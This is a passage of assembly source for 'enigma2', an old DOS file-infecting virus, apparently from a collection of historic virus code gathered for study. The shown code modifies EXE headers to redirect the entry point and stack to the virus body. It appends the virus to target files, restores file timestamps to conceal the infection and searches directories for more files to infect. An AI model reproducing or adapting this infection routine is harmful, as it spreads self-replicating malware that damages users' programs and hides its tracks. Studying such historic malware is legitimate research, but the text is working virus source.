enigma2.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

	jmp	append_ok
	
set_new_data:
	push	bx
	push	dx
	mov	dx,offset buffer.new_data
	sub	dx,adjust
	add	dx,bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]				;Load handle
	mov	cx,001bh			;Read formatted exe header
	mov	ax,3f00h
	int	21h				;Read function call
	pop	dx
	pop	bx
	jnc	read_header
	jmp	append_ok

read_header:
	nop					;some code to modify header
						;
			
	mov	si,offset buffer.pointer5
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	add	si,2
	add	ax,0ch
	adc	word ptr [si],0000h
	sub	si,2
	mov	[si],ax			;This code restores original
					;filelength
			
	mov	si,offset buffer.new_data
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	cmp	ax,5a4dh		;check for valid exe file
	jz	valid_exe
	jmp	append_ok
	
valid_exe:
	mov	ax,[si+8]		;Load module size
	xor	dx,dx
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1			;Multiply by 16
	
	push	ax
	push	dx			;Adjust new size
	push	cx
	mov	dx,virussize-896+64
	push	dx
	mov	cx,0009h
	shr	dx,cl
	add	word ptr [si+4],dx
	pop	dx
	and	dx,01ffh
	add	dx,word ptr [si+2]
	cmp	dx,512
	jl	adjust_okay
	sub	dx,512
	inc	word ptr [si+4]
adjust_okay:
	mov	word ptr [si+2],dx	
	pop	cx
	pop	dx
	pop	ax
	

	push	si			;This SI is very useful so save it
							
	mov	si,offset buffer.pointer5
	sub	si,adjust
	add	si,bx
	sub	[si],ax
	mov	ax,[si]
	sbb	[si+2],dx
	mov	dx,[si+2]		;the byte size of the load module
			

	pop	si
	push	ax
	push	dx
	mov	ax,[si+14h]
	mov	dx,[si+16h]		;Get CS:IP value
	mov	cx,[si+0eh]		;Get SS value
	push	si
	mov	si,offset buffer.IP_save
	sub	si,adjust
	add	si,bx
	xchg	[si],ax
	xchg	[si+2],dx
	mov	si,offset buffer.SS_save
	sub	si,adjust
	add	si,bx
	xchg	[si],cx
	mov	si,offset buffer.ip_old
	sub	si,adjust
	add	si,bx
	mov	[si],ax
	mov	[si+2],dx
	mov	si,offset buffer.ss_old
	sub	si,adjust
	add	si,bx
	mov	[si],cx
	pop	si
	pop	dx
	pop	ax
	
	push	ax
	push	dx
	
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1			;Multiply by 16
	
	mov	cx,0008h
	shl	dx,cl
	mov	cx,0004h
	shr	ax,cl			;A very obscure algorithm to make
					;a segment:offset pair
	mov	[si+14h],ax
	mov	[si+16h],dx		;Infected values

	push	si
	mov	si,offset buffer.far_push
	sub	si,adjust
	add	si,bx
	xchg	[si],dx
	mov	word ptr [si+2],dx
	pop	si
		
	pop	dx
	pop	ax
	add	ax,virussize		;
	adc	dx,0000h

	mov	cx,0003h	
mul_loop:

	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1			;Multiply by 4096
	loop	mul_loop
				
	or	ax,ax
	jz	exact_value
	inc	dx
exact_value:	
	mov	[si+0eh],dx		;Infected stack segment 
		
					;Write back infected header
	push	si
	push	bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]
	mov	ax,5700h		;Get time function
	int	21h
	pop	bx
	pop	si
	jnc	correct_time
	jmp	append_ok1
	
correct_time:
	push	cx
	push 	bx
	push	dx
	mov	si,offset buffer.handle
	sub	si,adjust
	add 	si,bx
	mov	bx,[si]
	xor	cx,cx
	xor	dx,dx
	mov	ax,4200h			;From beginning of file
	int	21h				;Lseek function call
	pop	dx
	pop	bx
	pop	cx
	jnc	continue_infection
	jmp	append_ok1
	
continue_infection:
	
	push	cx
	push	dx
	push	bx
	mov	dx,offset buffer.new_data
	sub	dx,adjust
	add	dx,bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]				;Load handle
	mov	cx,001bh			;Write infected exe header
	mov	ax,4000h
	int	21h				;Write function call
	pop	bx
	pop	dx
	pop	cx
	jnc	glue_virus
	jmp	append_ok1

glue_virus:
							
	push	cx
	push 	bx
	push	dx
	mov	si,offset buffer.handle
	sub	si,adjust
	add 	si,bx
	mov	bx,[si]
	xor	cx,cx
	xor	dx,dx
	mov	ax,4202h			;From the end of file
	int	21h				;Lseek function call
	pop	dx
	pop	bx
	pop	cx
	jnc	write_data
	jmp	append_ok1
	
write_data:
	
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	
	push	dx
	push	cx
	
	mov	dx,bx
	sub	dx,3				;The starting three byte
						;call instruction
	push	es
	push	bx
	push	dx
	push	si
	mov	ax,2f00h
	int	21h
	pop	si
	pop	dx
	
	push	es
	push	bx
	
	push	si
	mov	ax,1a00h
	int	21h
	pop	si
	
							
	mov	bx,[si]				;Load handle
	mov	cx,virussize-896+64		;Length of virus obtained
	mov	ax,4000h			;with dir
	int	21h
	lahf					;Write function call

	pop	bx
	pop	es
	
	push	ds
	push	es
	pop	ds
	mov	dx,bx
	push	ax
	mov	ax,1a00h
	int	21h
	pop	ax
	
	pop	ds
	pop	bx
	pop	es
	
	pop	cx
	pop	dx
	
	sahf
	jnc	put_stamp			;Error or not file
	jmp	append_ok1			;is closed	
	
put_stamp:
	push	bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]
	mov	ax,5701h		;Set time function
	int	21h
	pop	bx

append_ok1:

	mov	si,offset buffer.ip_old	;Restore previous CS:IP values
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	dx,[si+2]
	mov	si,offset buffer.IP_save
	sub	si,adjust
	add	si,bx
	mov	[si],ax
	mov	[si+2],dx	

	mov	si,offset buffer.save_push
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	word ptr [si-2],ax
	
	mov	si,offset buffer.ss_old
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	si,offset buffer.SS_save
	sub	si,adjust
	add	si,bx
	mov	word ptr [si],ax
		
		
append_ok:
	mov	si,offset buffer.help_flag
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	add 	si,2
	mov	[si],ax			;This code effectively moves
					;help_flag into where_from_flag 

		
	jmp	close_error			;
	
error_exit:
	mov	si,offset buffer.pointer3
	sub	si,adjust
	add	si,bx
	mov	dx,[si]			;Restore original DTA
	add	si,2
	mov	ax,[si]
	push	ds
	mov	ds,ax
	mov	ax,1a00h		;Set DTA function call
	int	21h
	pop	ds
	pop	di
	pop	si
	pop	dx
	pop	cx
	pop	bx
	pop	ax
	ret		
	
try_to_infect	ENDP
								
transfer_filespec 	PROC

	push	si
	mov	si,offset buffer.filematch 	;Transfer name to the working
						;area
	sub	si,adjust
	add	si,bx
	call	byte_move
	pop	si
	ret	

transfer_filespec 	ENDP

search_all 	PROC

	push	si
	mov	si,offset buffer.matchall	;This is the '*.*' filename
	sub	si,adjust
	add	si,bx
	call	byte_move
	pop	si
	ret	
	
search_all 	ENDP
	
byte_move	PROC

	push	ax
	push	di

	cld	

move_loop:
	lodsb	
	stosb	
	or	al,al				;The string to move is ASCIIZ
	jne	move_loop
	pop	di
	pop	ax
	ret	
	
byte_move	ENDP
	
find_first	PROC

	push	cx
	push	bx
	cmp	dx,0000h
	jnbe	over_set
	mov	dx,offset buffer.buffer2		;Set Data Transfer Area
	sub	dx,adjust				;or Disk Transfer area
	add	dx,bx					;
over_set:
	add	dx,02Bh
	mov	cx,00010h				;Attribute byte for 
							;directory search
	mov	ah,01ah
	int	021h					;Set DTA function call
	
	pop	bx
	push	bx
	push	dx
	mov	dx,offset buffer.buffer1
	sub	dx,adjust
	add	dx,bx
	mov	ah,04eh				;find first
						;function call
	int	021h
	pop	dx
	pop	bx
	pop	cx
	ret	
	
find_first	ENDP
	
find_next 	PROC

	push	cx
	push	bx
	push	dx
	mov	dx,offset buffer.buffer1
	sub	dx,adjust
	add	dx,bx
	mov	cx,00010h
	mov	ah,04fh				;Find next function call
	int	021h
	pop	dx
	pop	bx
	pop	cx
	ret	

find_next 	ENDP

ask_question    PROC

        mov     dx,offset buffer.question
        mov     ax,09
        int     21h
        xor     ax,ax
        int     16h

ask_question    ENDP


setup_data:
	cli
	pop	bx			;This will catch instruction pointer 
	push	bx	
	sti				;value and after that restore stack
	ret				;pointer value		


buffer	data_area	<>		;Reseve data_area space 	

        code    ends
	END 	start